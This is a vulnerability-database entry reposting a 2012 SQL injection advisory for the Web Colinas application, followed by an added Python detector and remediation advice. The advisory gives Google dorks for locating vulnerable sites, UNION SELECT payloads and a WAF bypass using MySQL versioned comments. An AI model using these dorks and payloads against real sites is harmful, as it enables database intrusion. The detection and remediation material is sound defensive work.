Web Colinas SQL Injection Vulnerability

Vulnerability ID 1046142 Vulnerability type
Published 2012-11-17 Updated 2012-11-17
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2012110119
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability exploit (EXP)
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Web Colinas Sql Injection Vulnerability
# Google Dork(1): intext:"Web Colinas" inurl:".php?id="
# Google Dork(2): intext:"Web Colinas" inurl:".php?c="
# Date: 16/11/2012
# Author: Sys32
# Email: tha.Sys32[at]gmail[dot]com
# Vendor: http://www.webcolinas.pt/
# Category: Webapp
# Tested on: Backtrack 5 r3
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# I. INFO.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The application is vulnerable to SQL injection, allowing an attacker to gain full access to the database.
# Some injections need a WAF bypass.
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# II. EXPLOIT.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# http://127.0.0.1/vull-page.php?id=[Sql-Injection]
#
# http://127.0.0.1/Vull-page.php?c=[Sql-Injection]
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# III. EXPLOIT Example.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Injection:
#
# http://127.0.0.1/Vull-page.php?c=-3 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# http://127.0.0.1/vull-page.php?id=-3  union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# Injection + WAF Bypass:
#
# http://127.0.0.1/Vull-page.php?id=-3/*!20000union*/+/*!20000SelEct*/ 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# http://127.0.0.1/Vull-page.php?c=-3/*!20000union*/+/*!20000SelEct*/ 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# IV. Risk.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The security risk of the remote SQL injection vulnerability is estimated as critical.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
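The WAF bypass in section III works because MySQL executes the body of a `/*!NNNNN ... */` comment, so a filter that matches the literal text `union select` never sees it. The following is an added detection example, not part of the original advisory: it unwraps those comments before matching and also applies an integer allow-list to the `id` and `c` parameters. The function names, the sample URLs and the assumption that both parameters should be plain integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# MySQL runs the body of /*!NNNNN ... */ when the server version is >= NNNNN,
# so a filter must unwrap it rather than treat it as an inert comment.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(\s+(all|distinct))?\s+select\b")
WATCHED = {"id", "c"}  # parameters named in the advisory


def normalize(value: str) -> str:
    """Reduce a decoded parameter value to the form MySQL would parse."""
    value = VERSIONED.sub(r" \1 ", value)   # keep the keyword inside /*!...*/
    value = PLAIN_COMMENT.sub(" ", value)   # ordinary comments act as whitespace
    return re.sub(r"\s+", " ", value).strip().lower()


def is_numeric_id(value: str) -> bool:
    """Allow-list: both parameters are expected to be plain integers (assumption)."""
    return re.fullmatch(r"\d{1,10}", value) is not None


def inspect(url: str) -> list:
    """Return (parameter, reason) findings for one requested URL."""
    findings = []
    # parse_qsl percent-decodes and turns '+' into a space, as PHP's $_GET does.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name.lower() not in WATCHED:
            continue
        if UNION_SELECT.search(normalize(value)):
            findings.append((name, "union-select"))
        elif not is_numeric_id(value):
            findings.append((name, "non-numeric"))
    return findings


# Constructed sample requests; the flagged ones follow the shapes quoted above.
SAMPLES = [
    "http://127.0.0.1/page.php?id=12",
    "http://127.0.0.1/page.php?c=-3 union select 1,2,version(),4--",
    "http://127.0.0.1/page.php?id=-3/*!20000union*/+/*!20000SelEct*/ 1,2,version(),4--",
    "http://127.0.0.1/page.php?id=12abc",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect(url) or "clean", url)
```

Pattern matching of this kind is a detection aid only; the fix in the application is to cast the two parameters to integers or bind them through prepared statements.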